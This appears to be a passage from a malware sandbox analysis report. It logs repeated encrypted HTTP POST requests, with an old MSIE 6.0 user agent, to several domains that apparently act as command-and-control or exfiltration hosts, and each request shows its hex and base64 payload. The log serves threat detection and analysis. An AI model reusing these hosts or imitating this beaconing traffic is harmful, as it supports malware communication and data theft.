                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.yoruksut.comCache-Control: no-cacheData Raw: 42 56 42 6a 56 4f 6b 76 64 50 2f 49 6e 63 46 4f 75 44 67 74 4c 67 4b 45 4d 78 61 48 6d 37 7a 36 4c 52 45 6b 43 62 7a 53 35 50 45 43 53 38 70 67 2b 6d 6f 35 2b 42 66 6b 4a 71 31 76 63 36 5a 38 70 32 75 57 32 49 5a 52 30 6a 57 2f 76 68 33 6b 36 64 38 37 45 56 2f 54 6f 42 79 2b 69 37 6d 6c 50 42 48 6e 72 66 41 77 6d 6c 76 6a 73 49 70 41 62 36 36 67 58 4b 57 6b 36 75 72 47 47 33 58 31 56 64 51 42 64 4b 79 4d 4c 4b 35 76 66 76 71 37 77 34 48 63 64 66 41 77 5a 6c 6e 4e 76 41 4b 4c 67 61 5a 44 55 59 4a 4a 70 46 4e 69 75 69 79 6e 54 62 45 78 49 4c 2b 51 51 54 6c 6c 6f 4a 6f 71 4e 49 67 59 4d 62 36 41 6a 6d 68 49 45 4a 6e 4b 76 44 4f 6f 67 31 5a 44 42 53 70 78 62 51 37 50 7a 33 31 33 64 6b 43 75 35 72 2f 67 4a 6e 49 4b 61 6d 43 33 52 6b 4e 38 35 76 43 64 70 73 46 7a 6c 72 78 59 50 6b 6b 77 41 46 35 66 4a 4f 73 30 6e 62 6c 34 50 54 68 48 67 62 6b 42 4d 32 68 52 79 72 2f 79 31 2b 67 71 58 78 2f 55 43 6b 48 4a 45 78 68 74 46 46 5a 51 4e 50 48 33 37 68 36 6c 75 6e 34 75 58 64 47 64 53 78 39 4e 52 54 52 61 41 78 65 74 69 45 57 6b 57 48 30 41 4f 74 4e 45 6e 68 70 6f 73 62 47 4f 6a 68 74 51 31 39 38 47 64 76 51 43 59 76 55 44 4a 4c 62 79 2f 41 57 45 48 31 65 34 74 46 2f 42 65 4d 35 54 68 4e 7a 65 51 6f 4d 2b 6f 47 65 6c 75 73 37 34 43 69 51 6c 68 4b 58 4d 68 31 45 35 4a 77 4a 65 36 6b 37 30 55 79 51 44 6b 75 34 37 38 54 38 77 6f 6f 32 61 6f 47 44 54 75 67 57 57 31 78 49 46 32 46 52 77 4e 55 79 34 71 42 53 2f 6e 42 2b 6f 34 4a 67 30 55 68 50 5a 70 78 47 44 4b 4f 63 44 46 47 7a 41 48 66 50 70 46 2b 75 32 57 52 4f 75 64 77 72 4e 75 2f 62 4e 51 54 69 4f 6a 53 45 34 30 51 49 57 37 73 46 49 50 74 32 62 54 4b 4b 57 45 42 34 3d Data Ascii: BVBjVOkvdP/IncFOuDgtLgKEMxaHm7z6LREkCbzS5PECS8pg+mo5+BfkJq1vc6Z8p2uW2IZR0jW/vh3k6d87EV/ToBy+i7mlPBHnrfAwmlvjsIpAb66gXKWk6urGG3X1VdQBdKyMLK5vfvq7w4HcdfAwZlnNvAKLgaZDUYJJpFNiuiynTbExIL+QQTlloJoqNIgYMb6AjmhIEJnKvDOog1ZDBSpxbQ7Pz313dkCu5r/gJnIKamC3RkN85vCdpsFzlrxYPkkwAF5fJOs0nbl4PThHgbkBM2hRyr/y1+gqXx/UCkHJExhtFFZQNPH37h6lun4uXdGdSx9NRTRaAxetiEWkWH0AOtNEnhposbGOjhtQ198GdvQCYvUDJLby/AWEH1e4tF/BeM5ThNzeQoM+oGelus74CiQlhKXMh1E5JwJe6k70UyQDku478T8woo2aoGDTugWW1xIF2FRwNUy4qBS/nB+o4Jg0UhPZpxGDKOcDFGzAHfPpF+u2WROudwrNu/bNQTiOjSE40QIW7sFIPt2bTKKWEB4=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stajum.comCache-Control: no-cacheData Raw: 74 42 42 79 6c 6d 46 6b 58 66 38 73 58 73 34 41 77 4c 4b 6b 4e 7a 70 4c 51 68 68 66 52 62 30 48 4a 52 46 4c 62 32 6e 51 4f 5a 7a 41 72 30 50 4e 70 54 4a 65 41 6d 53 50 70 35 52 57 4b 75 38 4e 48 43 68 2b 6a 72 63 77 74 6f 4b 43 41 2f 2b 74 78 74 51 65 4b 47 31 46 79 6c 65 6d 4b 33 33 69 65 45 53 33 30 6e 35 2f 66 6e 67 70 32 73 57 68 2f 67 54 2f 77 48 4f 37 47 44 30 52 78 49 6e 6f 77 4a 47 61 71 55 74 54 32 6a 31 67 46 73 54 39 4d 63 2b 53 4a 63 56 68 65 66 70 57 76 39 33 76 51 41 74 71 50 49 64 43 37 55 75 4d 44 4c 68 78 35 75 75 75 62 4a 38 4e 52 54 74 73 72 57 75 50 56 6f 54 48 73 49 61 42 74 49 7a 5a 62 78 4f 72 43 76 71 54 68 58 6c 75 67 72 38 75 37 4f 34 6b 73 58 49 42 32 49 61 68 4f 36 73 59 75 78 32 78 6a 4c 37 64 70 4d 38 4f 32 35 67 53 36 6b 65 69 4c 59 75 54 58 4a 70 58 71 45 47 4c 4b 6d 39 50 53 63 30 37 78 36 57 48 63 71 57 74 32 37 4c 72 70 32 7a 6c 4a 39 78 37 2b 4a 53 44 43 78 62 62 51 4b 32 4d 70 55 55 49 4d 46 2f 70 55 6c 51 4f 34 4d 69 73 75 78 31 6a 65 76 6b 38 6e 68 63 49 54 70 61 4b 59 66 62 69 34 6a 78 49 52 72 77 6b 44 6c 71 78 58 6f 49 6a 54 63 4c 57 55 38 31 5a 49 42 54 71 58 30 52 6c 4d 71 31 42 62 72 66 30 44 2b 4f 55 68 4b 78 71 47 70 70 31 47 6c 57 6a 71 65 73 70 49 68 71 59 57 61 74 2b 4f 45 34 36 59 79 54 54 67 35 79 31 6b 71 78 59 47 73 5a 4a 55 46 44 4d 55 41 6d 71 44 4f 48 57 6c 6f 2b 55 38 7a 42 73 73 4b 70 72 35 59 61 42 44 54 70 51 78 65 2f 44 5a 4e 62 2f 46 4f 54 53 4c 77 73 59 6e 2f 66 67 2b 61 6e 78 4a 4d 53 4e 63 48 59 59 79 47 72 4e 65 61 73 62 74 36 5a 6c 6d 38 65 6c 35 33 2b 2f 69 59 70 66 36 39 76 49 46 33 68 63 45 44 72 35 41 51 34 31 47 70 48 43 56 6b 2f 54 34 77 3d 3d Data Ascii: tBBylmFkXf8sXs4AwLKkNzpLQhhfRb0HJRFLb2nQOZzAr0PNpTJeAmSPp5RWKu8NHCh+jrcwtoKCA/+txtQeKG1FylemK33ieES30n5/fngp2sWh/gT/wHO7GD0RxInowJGaqUtT2j1gFsT9Mc+SJcVhefpWv93vQAtqPIdC7UuMDLhx5uuubJ8NRTtsrWuPVoTHsIaBtIzZbxOrCvqThXlugr8u7O4ksXIB2IahO6sYux2xjL7dpM8O25gS6keiLYuTXJpXqEGLKm9PSc07x6WHcqWt27Lrp2zlJ9x7+JSDCxbbQK2MpUUIMF/pUlQO4Misux1jevk8nhcITpaKYfbi4jxIRrwkDlqxXoIjTcLWU81ZIBTqX0RlMq1Bbrf0D+OUhKxqGpp1GlWjqespIhqYWat+OE46YyTTg5y1kqxYGsZJUFDMUAmqDOHWlo+U8zBssKpr5YaBDTpQxe/DZNb/FOTSLwsYn/fg+anxJMSNcHYYyGrNeasbt6Zlm8el53+/iYpf69vIF3hcEDr5AQ41GpHCVk/T4w==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pdqhomes.comCache-Control: no-cacheData Raw: 68 49 56 38 43 70 65 49 55 50 39 4f 79 35 30 32 68 67 32 78 6f 4f 43 61 6d 44 62 4e 4e 42 47 39 75 31 55 31 30 61 76 46 54 66 64 78 34 58 4f 43 45 61 6e 71 45 72 45 62 44 68 74 54 76 6e 61 61 50 6f 69 50 35 50 51 74 58 2b 69 54 62 70 55 79 52 75 44 51 68 64 57 6c 4c 6d 46 41 32 36 7a 33 77 46 46 77 67 46 77 4d 34 2f 58 62 77 72 68 31 73 33 79 4d 6d 54 55 45 67 71 74 4e 4f 68 39 43 54 6b 44 67 74 78 58 6a 61 4c 42 66 79 2b 6b 59 72 6a 6b 76 36 62 4a 4a 32 4e 62 68 79 6d 63 74 2f 49 4d 69 36 57 65 68 6e 62 57 66 33 6f 63 4b 64 77 63 6d 45 70 49 6a 33 70 62 68 6f 6c 64 44 46 76 74 75 6c 6d 48 30 79 63 70 49 79 54 4a 4c 2f 45 75 41 79 43 34 4a 34 79 30 64 63 71 4b 33 4c 6c 38 32 56 77 46 58 47 46 54 36 37 76 54 6b 51 61 6d 30 62 6e 47 7a 31 51 5a 76 51 36 57 68 68 73 30 72 35 44 6b 54 42 43 6e 43 7a 6e 49 72 79 34 78 4c 70 5a 55 50 33 58 6a 76 4b 46 64 53 76 45 78 33 44 6c 32 67 64 75 58 75 42 41 72 58 64 53 52 52 6a 64 78 4e 6b 73 78 63 63 79 2f 67 67 6f 4d 4d 55 72 48 5a 52 57 68 57 62 51 52 2b 34 4c 78 5a 36 56 64 77 35 66 77 4e 6e 52 69 6b 39 53 72 71 4c 66 49 69 52 45 75 74 64 64 35 37 52 32 42 78 48 71 33 4d 2f 34 72 6d 48 4d 70 44 2f 6a 39 65 45 69 4a 6c 57 4e 42 6b 69 6e 37 70 58 46 4c 7a 2f 4f 4d 45 34 70 54 63 78 6f 76 4f 76 64 51 52 4b 36 54 71 33 4c 62 46 30 41 61 38 73 6e 71 67 6d 6d 49 4a 70 7a 65 67 49 31 36 52 69 6a 47 34 51 67 65 37 2b 52 6f 6b 56 2b 33 67 34 45 6f 78 2f 4e 54 41 4f 45 55 68 67 67 36 4e 78 4d 58 6e 46 2f 66 47 4a 6e 32 30 50 4a 46 38 35 31 68 5a 2f 43 38 58 4c 59 79 52 32 55 70 54 36 57 53 42 37 56 7a 2f 41 36 6c 75 49 58 66 2f 69 4b 64 38 33 2b 6f 4a 51 61 38 34 36 42 6b 2b 39 41 4f 69 71 69 48 62 36 6c 31 36 65 4f 6d 6d 69 77 3d 3d Data Ascii: hIV8CpeIUP9Oy502hg2xoOCamDbNNBG9u1U10avFTfdx4XOCEanqErEbDhtTvnaaPoiP5PQtX+iTbpUyRuDQhdWlLmFA26z3wFFwgFwM4/Xbwrh1s3yMmTUEgqtNOh9CTkDgtxXjaLBfy+kYrjkv6bJJ2Nbhymct/IMi6WehnbWf3ocKdwcmEpIj3pbholdDFvtulmH0ycpIyTJL/EuAyC4J4y0dcqK3Ll82VwFXGFT67vTkQam0bnGz1QZvQ6Whhs0r5DkTBCnCznIry4xLpZUP3XjvKFdSvEx3Dl2gduXuBArXdSRRjdxNksxccy/ggoMMUrHZRWhWbQR+4LxZ6Vdw5fwNnRik9SrqLfIiREutdd57R2BxHq3M/4rmHMpD/j9eEiJlWNBkin7pXFLz/OME4pTcxovOvdQRK6Tq3LbF0Aa8snqgmmIJpzegI16RijG4Qge7+RokV+3g4Eox/NTAOEUhgg6NxMXnF/fGJn20PJF851hZ/C8XLYyR2UpT6WSB7Vz/A6luIXf/iKd83+oJQa846Bk+9AOiqiHb6l16eOmmiw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.baijaku.comCache-Control: no-cacheData Raw: 51 67 41 7a 41 41 34 7a 55 50 38 4d 65 36 5a 30 6d 52 38 33 4a 48 48 6e 71 68 49 4f 55 6e 65 75 49 6b 51 56 52 61 61 66 2f 36 36 61 70 4c 74 7a 31 58 34 6a 39 70 4e 34 4a 30 57 67 6c 79 43 53 32 62 50 46 33 45 54 78 36 56 2b 76 6b 49 32 2b 69 55 65 66 37 74 62 34 4d 50 53 52 45 55 50 50 39 67 71 56 76 71 42 59 53 7a 66 31 63 6a 62 54 59 4b 61 31 53 47 4c 2b 70 2b 4b 45 75 4f 4c 36 79 69 41 6f 42 74 38 65 2b 63 4a 58 68 5a 6c 55 2f 45 48 74 66 54 4a 78 43 47 6b 37 69 2b 58 56 75 68 4d 5a 47 45 6d 41 4b 73 33 77 6b 49 65 31 49 71 41 4b 38 6c 63 49 69 65 41 76 48 50 61 43 74 69 48 52 70 55 2b 45 7a 6b 77 39 74 6e 4a 41 37 37 77 39 4d 4e 36 43 36 31 31 41 4a 6b 33 30 2b 47 39 73 45 6b 32 51 6e 49 6b 36 6c 43 71 4c 78 69 77 4f 44 56 62 33 4c 4d 5a 76 33 2b 6b 30 49 75 69 51 51 6c 49 59 38 48 75 59 49 49 78 68 57 33 4a 58 45 74 54 38 72 51 31 48 30 52 6d 59 31 67 65 38 41 4d 75 65 51 31 67 4c 43 72 43 58 46 47 58 4f 6b 5a 36 4e 68 74 43 36 55 2b 71 57 52 48 50 68 72 56 6e 4c 73 31 75 47 77 45 2f 55 44 6e 6e 57 55 66 45 4b 4a 6d 79 56 4c 76 33 61 4c 69 4c 62 47 4f 5a 37 4c 45 59 71 79 79 32 49 57 35 79 71 6d 39 6b 35 78 59 2f 47 4d 79 73 70 37 76 37 4c 45 35 34 7a 73 45 56 4d 64 6e 4f 64 72 66 66 45 4d 43 76 49 71 31 61 62 56 51 35 79 78 71 45 49 33 72 51 42 35 36 35 37 33 6e 34 69 6c 39 72 59 37 57 34 55 7a 4f 53 50 63 39 51 52 6c 59 42 4e 46 51 6f 75 4e 59 71 31 5a 41 64 51 69 67 52 61 4c 61 4e 6e 7a 45 42 2b 58 57 49 35 6f 68 38 71 4e 4a 6b 59 6c 44 6d 42 2f 72 51 5a 50 47 4a 44 79 68 6c 63 55 50 41 76 33 61 37 74 42 5a 34 76 4d 4e 48 75 4b 56 63 4a 36 63 70 6d 69 47 2b 66 39 6c 4e 62 79 38 71 50 64 6f 56 57 74 70 37 54 51 6b 5a 6e 70 31 56 34 4d 6c 41 35 71 6d 4f 41 71 31 65 41 43 30 35 45 61 6f 41 32 53 30 34 74 Data Ascii: QgAzAA4zUP8Me6Z0mR83JHHnqhIOUneuIkQVRaaf/66apLtz1X4j9pN4J0WglyCS2bPF3ETx6V+vkI2+iUef7tb4MPSREUPP9gqVvqBYSzf1cjbTYKa1SGL+p+KEuOL6yiAoBt8e+cJXhZlU/EHtfTJxCGk7i+XVuhMZGEmAKs3wkIe1IqAK8lcIieAvHPaCtiHRpU+Ezkw9tnJA77w9MN6C611AJk30+G9sEk2QnIk6lCqLxiwODVb3LMZv3+k0IuiQQlIY8HuYIIxhW3JXEtT8rQ1H0RmY1ge8AMueQ1gLCrCXFGXOkZ6NhtC6U+qWRHPhrVnLs1uGwE/UDnnWUfEKJmyVLv3aLiLbGOZ7LEYqyy2IW5yqm9k5xY/GMysp7v7LE54zsEVMdnOdrffEMCvIq1abVQ5yxqEI3rQB56573n4il9rY7W4UzOSPc9QRlYBNFQouNYq1ZAdQigRaLaNnzEB+XWI5oh8qNJkYlDmB/rQZPGJDyhlcUPAv3a7tBZ4vMNHuKVcJ6cpmiG+f9lNby8qPdoVWtp7TQkZnp1V4MlA5qmOAq1eAC05EaoA2S04t
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.olras.comCache-Control: no-cacheData Raw: 38 70 65 4a 72 52 76 55 56 66 39 42 65 69 57 59 4d 6e 72 77 48 41 54 68 47 6f 4b 68 45 4c 32 35 66 33 65 39 38 43 6e 49 62 33 65 71 45 6b 2f 55 79 31 4e 69 6e 74 6a 6c 77 75 42 66 70 62 70 31 2f 67 50 6b 6a 36 51 6c 54 4f 74 34 4d 4f 62 61 34 56 75 30 54 32 71 37 65 52 51 41 6e 45 48 72 4d 78 69 4a 38 46 43 78 76 58 46 36 74 6f 58 33 70 64 69 31 6f 39 50 45 71 73 55 2f 56 61 51 63 33 49 67 4f 7a 65 6c 33 4b 65 73 70 6e 64 51 52 4b 67 39 77 73 43 52 4d 61 6c 49 78 64 30 2b 4b 64 6a 41 74 57 61 77 69 32 51 32 54 45 57 66 68 51 59 2b 43 55 50 6c 46 46 78 71 65 6a 36 6f 55 34 38 2f 50 62 51 54 41 77 56 62 66 63 5a 6c 55 41 52 37 34 79 70 44 6b 4b 55 5a 73 39 39 71 77 74 4e 2f 65 54 6d 50 62 61 79 53 71 59 6a 39 56 39 47 33 55 35 6d 4e 75 56 56 45 33 52 6f 73 6c 49 52 42 35 42 73 64 52 49 49 76 54 61 74 6c 4b 38 2b 64 65 61 71 64 63 49 79 30 76 77 79 51 6b 34 78 6c 57 30 70 35 34 43 36 50 4a 79 4b 57 71 50 57 39 34 68 52 4d 5a 4c 52 49 32 41 74 63 48 5a 35 6c 72 4f 33 59 72 35 74 46 34 72 64 50 78 78 4b 57 77 4b 5a 70 50 4b 47 37 53 70 38 49 43 54 64 32 73 78 34 7a 55 63 38 5a 70 64 5a 66 44 49 47 69 4a 4a 53 68 4a 79 44 56 74 7a 48 6b 61 2b 47 2f 57 30 56 6f 33 62 66 75 5a 67 6e 67 4c 6d 4a 79 39 33 69 51 70 66 58 32 39 63 2b 50 46 2b 49 33 63 76 6b 79 38 5a 77 6e 31 49 61 41 53 45 68 67 4e 42 44 38 70 45 43 67 42 4f 69 66 56 52 6b 57 43 76 77 76 4e 66 52 4b 31 62 75 42 61 6f 61 69 33 46 56 51 66 77 50 4e 32 65 30 76 38 6c 73 48 37 58 44 67 68 73 45 58 58 75 75 58 6a 6f 38 55 53 64 50 2f 31 75 47 63 6c 6e 6b 6d 57 44 6c 5a 7a 65 38 58 56 76 35 43 57 42 61 56 7a 47 65 61 47 64 39 51 5a 72 74 74 32 4a 41 74 6a 38 46 37 63 32 2f 64 44 6f 47 34 4b 79 49 6e 4c 63 79 39 44 53 33 2b 62 51 37 54 47 34 6e 63 3d Data Ascii: 8peJrRvUVf9BeiWYMnrwHAThGoKhEL25f3e98CnIb3eqEk/Uy1NintjlwuBfpbp1/gPkj6QlTOt4MOba4Vu0T2q7eRQAnEHrMxiJ8FCxvXF6toX3pdi1o9PEqsU/VaQc3IgOzel3KespndQRKg9wsCRMalIxd0+KdjAtWawi2Q2TEWfhQY+CUPlFFxqej6oU48/PbQTAwVbfcZlUAR74ypDkKUZs99qwtN/eTmPbaySqYj9V9G3U5mNuVVE3RoslIRB5BsdRIIvTatlK8+deaqdcIy0vwyQk4xlW0p54C6PJyKWqPW94hRMZLRI2AtcHZ5lrO3Yr5tF4rdPxxKWwKZpPKG7Sp8ICTd2sx4zUc8ZpdZfDIGiJJShJyDVtzHka+G/W0Vo3bfuZgngLmJy93iQpfX29c+PF+I3cvky8Zwn1IaASEhgNBD8pECgBOifVRkWCvwvNfRK1buBaoai3FVQfwPN2e0v8lsH7XDghsEXXuuXjo8USdP/1uGclnkmWDlZze8XVv5CWBaVzGeaGd9QZrtt2JAtj8F7c2/dDoG4KyInLcy9DS3+bQ7TG4nc=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.quadlock.comCache-Control: no-cacheData Raw: 31 2f 65 51 51 44 42 4b 55 76 2f 48 38 67 4a 6b 51 39 66 62 4f 2b 4e 67 7a 50 48 59 62 45 69 62 5a 41 77 32 53 6c 4b 4c 57 47 42 77 39 6b 39 75 69 52 68 49 41 67 71 41 58 51 44 61 43 75 35 4f 58 5a 59 78 46 47 71 41 34 57 66 58 39 67 58 34 62 72 61 6c 52 37 43 47 31 34 6b 72 64 77 48 66 30 6e 37 65 77 54 43 7a 6b 70 58 33 35 66 46 53 48 79 6a 74 47 71 4e 51 49 73 74 6e 4b 6d 77 59 59 56 47 54 36 69 72 4b 4f 6e 57 79 56 6c 6c 68 6d 46 42 50 51 70 54 65 55 78 61 6d 7a 45 6d 33 74 68 63 67 47 2b 64 42 42 54 4e 4a 42 41 42 7a 66 32 52 43 46 54 49 74 34 57 46 42 78 2b 62 45 36 70 55 55 77 69 4b 32 5a 48 70 61 65 4c 31 47 67 4b 62 41 6b 50 43 30 71 79 49 31 4a 2f 6f 68 32 45 37 43 4b 37 63 2b 69 79 49 69 2b 67 39 62 52 64 42 63 4b 62 6a 44 43 37 4c 67 78 6f 70 66 54 48 43 63 4d 53 7a 48 35 79 59 57 61 42 52 65 53 4c 36 2b 69 41 48 6b 4d 55 65 31 6e 62 33 5a 78 52 4b 38 71 67 5a 72 78 63 2b 47 62 75 32 74 39 55 5a 4b 68 56 2f 65 62 74 30 6a 4a 7a 7a 54 75 4b 61 7a 6c 74 6c 6a 62 4f 6b 34 4f 58 42 38 63 32 45 64 6a 55 52 59 77 39 75 4a 76 67 62 77 43 71 78 6e 37 78 70 4b 38 6d 70 6d 50 77 6f 32 46 79 45 73 30 54 4a 36 54 59 46 53 77 2b 52 67 51 68 39 30 4d 66 68 46 58 6e 56 35 30 6d 64 79 69 62 37 39 4b 57 44 43 30 64 4c 72 72 74 77 49 6b 30 49 76 6d 2f 67 78 42 67 39 2f 50 45 69 31 38 56 33 4b 32 4f 43 4d 78 54 61 6e 78 58 73 77 6f 2b 61 56 52 43 4b 4f 33 44 56 7a 55 2b 69 30 71 52 52 5a 74 36 6e 33 54 71 74 61 4e 6d 50 2f 6c 52 68 57 4e 42 36 39 30 6e 4b 57 6e 68 58 63 79 6c 49 6f 63 43 50 48 78 7a 5a 7a 37 61 73 6a 37 32 31 47 4f 53 76 32 41 38 6b 61 4d 67 55 42 7a 73 77 6d 31 4a 68 6e 4f 51 64 66 59 4b 75 34 42 46 78 48 44 6c 2b 4e 32 41 3d 3d Data Ascii: 1/eQQDBKUv/H8gJkQ9fbO+NgzPHYbEibZAw2SlKLWGBw9k9uiRhIAgqAXQDaCu5OXZYxFGqA4WfX9gX4bralR7CG14krdwHf0n7ewTCzkpX35fFSHyjtGqNQIstnKmwYYVGT6irKOnWyVllhmFBPQpTeUxamzEm3thcgG+dBBTNJBABzf2RCFTIt4WFBx+bE6pUUwiK2ZHpaeL1GgKbAkPC0qyI1J/oh2E7CK7c+iyIi+g9bRdBcKbjDC7LgxopfTHCcMSzH5yYWaBReSL6+iAHkMUe1nb3ZxRK8qgZrxc+Gbu2t9UZKhV/ebt0jJzzTuKazltljbOk4OXB8c2EdjURYw9uJvgbwCqxn7xpK8mpmPwo2FyEs0TJ6TYFSw+RgQh90MfhFXnV50mdyib79KWDC0dLrrtwIk0Ivm/gxBg9/PEi18V3K2OCMxTanxXswo+aVRCKO3DVzU+i0qRRZt6n3TqtaNmP/lRhWNB690nKWnhXcylIocCPHxzZz7asj721GOSv2A8kaMgUBzswm1JhnOQdfYKu4BFxHDl+N2A==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 70 41 44 56 52 62 67 6c 53 76 2b 53 64 5a 68 59 4f 79 30 79 62 61 73 74 45 54 30 41 63 2b 62 57 62 42 7a 35 64 39 73 54 43 30 73 51 46 53 31 6b 6a 49 50 55 78 55 50 72 38 4d 36 5a 76 64 38 4a 65 35 56 34 32 58 38 54 79 77 37 35 6c 39 6b 5a 4d 4a 55 6c 4c 4d 31 62 70 38 76 52 51 34 76 53 68 63 30 35 58 2f 4b 32 2b 6a 6c 39 77 76 63 57 36 6b 53 50 76 6c 45 52 35 58 6d 4a 54 79 63 41 75 76 43 70 4b 78 36 37 4a 49 2b 55 34 74 33 6a 6b 78 4c 6e 47 74 6b 66 79 7a 45 79 30 74 62 4e 56 30 4c 6d 6e 43 6a 7a 43 6c 65 6e 79 31 5a 69 6b 63 35 31 52 33 47 30 61 36 42 41 76 4a 6b 56 32 73 41 33 2f 43 6f 43 33 67 65 73 70 53 64 63 70 58 62 79 79 48 48 35 6c 73 59 52 6e 6f 58 47 37 68 44 68 35 6c 75 39 69 70 42 7a 72 32 54 79 47 71 67 65 4c 71 61 73 67 73 55 32 65 77 71 36 66 6c 46 58 5a 65 39 56 39 56 49 2f 76 37 6f 55 77 63 76 68 69 79 51 57 67 63 30 4e 6c 56 39 7a 68 35 65 68 62 4e 4a 34 42 41 57 4c 79 33 54 4f 6b 6f 78 56 6c 4d 31 6c 54 46 6b 4f 2f 41 35 61 77 55 32 6d 50 38 33 72 72 4e 32 6d 2f 46 79 4c 4c 49 79 78 37 6e 5a 4c 48 6a 74 64 4d 44 66 58 67 33 70 47 6c 65 67 6b 78 6d 47 54 6d 70 47 2f 52 38 47 30 6c 6c 6f 56 74 6d 46 35 4f 66 6b 36 78 2b 57 39 57 42 49 44 71 51 70 49 55 36 4d 36 51 68 54 50 38 4f 38 53 6b 65 73 6a 52 34 76 63 73 57 45 77 38 67 44 41 71 5a 49 33 66 6e 44 61 76 32 46 68 38 6a 39 2b 30 74 45 45 77 6c 63 6d 31 48 53 34 63 47 38 52 53 47 4e 47 75 61 6b 2b 45 39 57 43 4d 76 77 33 78 70 42 68 70 4c 50 52 76 59 32 65 55 41 4a 61 30 41 69 76 54 4d 58 44 61 68 54 4a 6b 30 34 51 77 4f 39 43 78 2b 37 77 58 65 54 4b 37 70 62 36 35 6d 32 2f 79 6e 66 35 71 58 58 71 65 31 49 59 32 6f 6c 71 5a 4f 38 68 37 39 34 6d 4d 76 39 77 71 59 66 55 72 64 6e 44 45 51 36 34 6e 79 75 41 4f 66 71 56 4b 34 72 41 6b 74 6b 57 73 66 6c 74 58 68 56 43 35 66 55 79 Data Ascii: pADVRbglSv+SdZhYOy0ybastET0Ac+bWbBz5d9sTC0sQFS1kjIPUxUPr8M6Zvd8Je5V42X8Tyw75l9kZMJUlLM1bp8vRQ4vShc05X/K2+jl9wvcW6kSPvlER5XmJTycAuvCpKx67JI+U4t3jkxLnGtkfyzEy0tbNV0LmnCjzCleny1Zikc51R3G0a6BAvJkV2sA3/CoC3gespSdcpXbyyHH5lsYRnoXG7hDh5lu9ipBzr2TyGqgeLqasgsU2ewq6flFXZe9V9VI/v7oUwcvhiyQWgc0NlV9zh5ehbNJ4BAWLy3TOkoxVlM1lTFkO/A5awU2mP83rrN2m/FyLLIyx7nZLHjtdMDfXg3pGlegkxmGTmpG/R8G0lloVtmF5Ofk6x+W9WBIDqQpIU6M6QhTP8O8SkesjR4vcsWEw8gDAqZI3fnDav2Fh8j9+0tEEwlcm1HS4cG8RSGNGuak+E9WCMvw3xpBhpLPRvY2eUAJa0AivTMXDahTJk04QwO9Cx+7wXeTK7pb65m2/ynf5qXXqe1IY2olqZO8h794mMv9wqYfUrdnDEQ64nyuAOfqVK4rAktkWsfltXhVC5fUy
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.olras.comCache-Control: no-cacheData Raw: 38 70 65 4a 72 52 76 55 56 66 39 42 65 69 57 59 4d 6e 72 77 48 41 54 68 47 6f 4b 68 45 4c 32 35 66 33 65 39 38 43 6e 49 62 33 65 71 45 6b 2f 55 79 31 4e 69 6e 74 6a 6c 77 75 42 66 70 62 70 31 2f 67 50 6b 6a 36 51 6c 54 4f 74 34 4d 4f 62 61 34 56 75 30 54 32 71 37 65 52 51 41 6e 45 48 72 4d 78 69 4a 38 46 43 78 76 58 46 36 74 6f 58 33 70 64 69 31 6f 39 50 45 71 73 55 2f 56 61 51 63 33 49 67 4f 7a 65 6c 33 4b 65 73 70 6e 64 51 52 4b 67 39 77 73 43 52 4d 61 6c 49 78 64 30 2b 4b 64 6a 41 74 57 61 77 69 32 51 32 54 45 57 66 68 51 59 2b 43 55 50 6c 46 46 78 71 65 6a 36 6f 55 34 38 2f 50 62 51 54 41 77 56 62 66 63 5a 6c 55 41 52 37 34 79 70 44 6b 4b 55 5a 73 39 39 71 77 74 4e 2f 65 54 6d 50 62 61 79 53 71 59 6a 39 56 39 47 33 55 35 6d 4e 75 56 56 45 33 52 6f 73 6c 49 52 42 35 42 73 64 52 49 49 76 54 61 74 6c 4b 38 2b 64 65 61 71 64 63 49 79 30 76 77 79 51 6b 34 78 6c 57 30 70 35 34 43 36 50 4a 79 4b 57 71 50 57 39 34 68 52 4d 5a 4c 52 49 32 41 74 63 48 5a 35 6c 72 4f 33 59 72 35 74 46 34 72 64 50 78 78 4b 57 77 4b 5a 70 50 4b 47 37 53 70 38 49 43 54 64 32 73 78 34 7a 55 63 38 5a 70 64 5a 66 44 49 47 69 4a 4a 53 68 4a 79 44 56 74 7a 48 6b 61 2b 47 2f 57 30 56 6f 33 62 66 75 5a 67 6e 67 4c 6d 4a 79 39 33 69 51 70 66 58 32 39 63 2b 50 46 2b 49 33 63 76 6b 79 38 5a 77 6e 31 49 61 41 53 45 68 67 4e 42 44 38 70 45 43 67 42 4f 69 66 56 52 6b 57 43 76 77 76 4e 66 52 4b 31 62 75 42 61 6f 61 69 33 46 56 51 66 77 50 4e 32 65 30 76 38 6c 73 48 37 58 44 67 68 73 45 58 58 75 75 58 6a 6f 38 55 53 64 50 2f 31 75 47 63 6c 6e 6b 6d 57 44 6c 5a 7a 65 38 58 56 76 35 43 57 42 61 56 7a 47 65 61 47 64 39 51 5a 72 